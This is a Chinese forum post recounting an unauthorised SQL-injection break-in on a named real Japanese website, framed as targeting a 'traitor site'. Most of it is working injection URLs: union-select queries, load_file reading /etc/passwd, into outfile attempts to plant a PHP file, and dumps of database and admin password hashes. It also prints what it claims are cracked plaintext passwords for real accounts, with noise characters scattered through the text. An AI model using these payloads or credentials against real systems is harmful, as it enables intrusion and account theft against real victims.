找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3475|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

& u" v; }- o- M8 K
4 d, M% `; D% @( a! ~  U! q9 W0x01. 检测 www.zuaa.jp 收集数据
' @. J8 y- D( g
' R& P- {! H% k# c; Q
) H+ H' T: T$ V0 ]  k% I) T. Iwhatweb
( }) y; z  n( L% d3 ^, j8 S1 N- Z3 C2 O5 s5 ]9 b
0 c9 Z1 u4 B& _1 O  H# P
利用NMAP扫描
6 w) z( {, Y7 A* @! B; ]7 v& O8 m1 H5 p* v7 E7 U+ {3 e% Z
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持3 F" j9 g* i! ]; v6 K1 Q) v
0x02.找注入点, h; D9 q+ q# X6 @& i
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
$ `- T; v( D, j, [- [1 S4 R5 M3 V+ u3 w& }. y$ y$ |

2 u6 X/ `; u, w: @2 G% j4 x9 P/ \0 x0x03.order by& T; S0 p3 ^& Z6 A- C+ H0 _3 U
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
  [- i) ~" \/ l9 [$ |: C* U7 t4 r3 t$ t
order by 28报错,order by 27正常
2 j( K; `& E5 [) \( T
( K: G% e+ F! F% H3 e0x04.   union手动查询* B+ s, I$ }% O3 b- b- w/ P1 C
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 + I" X( f! K3 p0 q( y
添加到 27 时正常显示
" d& y$ ~9 U0 o) f* L: F
( X# }! L' B) ]' e中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
( ^# t3 U( F5 x9 x9 P- k( U* C- e- T( r+ o# _/ r6 ^/ N8 ]0 i
0x05. info:
; y6 ^+ l' b, Q* \) ehttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 % E% F+ F8 m& h" S

) U3 ?& W: c9 z7 |/ uuser:            root@localhost/ n  r/ r1 {, f( w  S$ L/ c
database:    openpne- m$ n* L" e6 D4 {6 o. b& p+ s: S
version:      4.1.22
; Z3 @- s/ c9 ?# bos:             portbld-freebsd5.4: O8 @' Q8 K5 i, Y* h
, S8 j4 ]3 D3 A" Z; M
0x06. root用户1 p: g: B) N: r& Z0 E
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
4 H/ C; d, i0 M# Jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 / V' N+ f  {9 P+ _$ P

/ S  Z6 k6 Y4 s( X+ K- p* c通过工具转换
& Y1 L% c* R4 j
6 k: P6 T. p: ?8 |+ z中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持" A3 U" e: s( p

) t7 }9 u3 Q0 D; Q0 f% @, F0x07. 利用 into outfile
4 z# D9 T# o3 E$ s- F全部都失败/ M) U4 [' X; q- I7 C1 a1 j
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
1 _1 e. i) c5 u' _: e# C  O# i4 K) V5 R- J
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
9 a  E& K$ H, Y( R, E& R7 K. ~: g# o: z' Y2 y
页面显示“MDB2 Error:syntax error”
" p6 A# ^) V" b; {, y
- ]. Z% j$ E+ h( X: u. a, B* V( x0x08. 利用 mysql 4.18 v" ~, _! A9 a- Y, l
猜常规表名,字段未果 工具 sqlmap
& H" `) W- a& n3 P1 {  ~* w: V中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持/ h9 x9 ?+ d# Z( j( o5 j
$ g7 |4 ^0 q1 g- u7 M
' Y3 d! I# y, M: j
# M! y8 v8 r' x1 x3 Q. V
0x09. 查找后台* b# i$ k( K7 U7 w2 d# z
利用 现有的各种 后台工具尝试都不行
, s' a9 Z3 T9 \% ?  O6 }. Z  ?8 e* w  e6 _$ h* Q
0x10.  MySL外联方法# d% `" V" [7 b
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
$ {$ [& P1 x5 @; y$ ^& V可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
, }* \; x/ h- v; |) Y* f; F" x0 p! Qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
3 t; C# Q! e+ ?- b; r4 \) `. ~8 W' K  Y0 R1 s  ^6 s& j
这个可以在 www.cmd5.com 解密
+ s2 A2 X/ B0 {& I7 [0 p" |root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
7 a/ ?# e& @9 M, n) Echen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
  p3 W1 _) w, y6 N+ a: ^openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
: a" u. a8 P# t, Nzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
" y0 D: x+ s3 y工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知. J- {3 H. i- @4 `2 c

" A. b1 r' A; P5 Q# s  K# z, b4 Y- H% d% V- Q( O; {& F
0x11. 网站突破
" F2 d$ ^/ L* l6 i发现网站的源程序 openpne, google 下载 openpne 源码
0 z6 {$ E5 y2 y; r
) E+ d/ }/ B0 |; V7 |' M8 }
. c5 u% B5 C' t- i0x12. 默认信息利用
, f, x* A6 V2 c  B+ Whttp://sns.zuaa.jp/?m=admin&a=page_login8 O2 a' \/ R  `' e8 K# y" n  @
. Q& \, v* c9 {( q) ]3 c# C: Y
表名 (c_admin_user) ,字段名(username,password)
. Q, o" Z' D4 T6 v0 P) Dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
; @9 e. q$ ]. W2 z% x% B8 _8 k0 J" \3 v% c8 f! i' [% u5 x
解密
* ]+ u! y; k) xzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
% m8 N+ W, N5 M6 f1 azuaajp:c0923ec5857796a393da99905008c176,          zju1897# ?7 F! i+ a/ v2 v/ G

" w3 `; M0 a. a" b1 h中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持, q+ S; s3 I3 J

. @' G/ ~- e/ \: ]0x13. 登录后台
& b4 }6 d! |8 a2 U; W) C0 Z
% o  s9 }5 Z, k+ b) d, h; T0 V/ U! z& o" |- U

/ C: G& N. O( L7 n8 N8 e$ T. K0x14. 小结# t- P% I. }1 u! @/ w
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
9 q5 T6 D* e* |' O' e感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
# |) p/ V5 |- [, o$ L* Z! L! b2 [' q------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain( a" o6 }6 K2 }; M
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持0 |( H5 k# f: o4 w8 U$ ^% g

5 K$ _4 Y6 ~# i( n0 T# P2 j最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!7 X5 c" K. J( k! ~. n' o- w

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表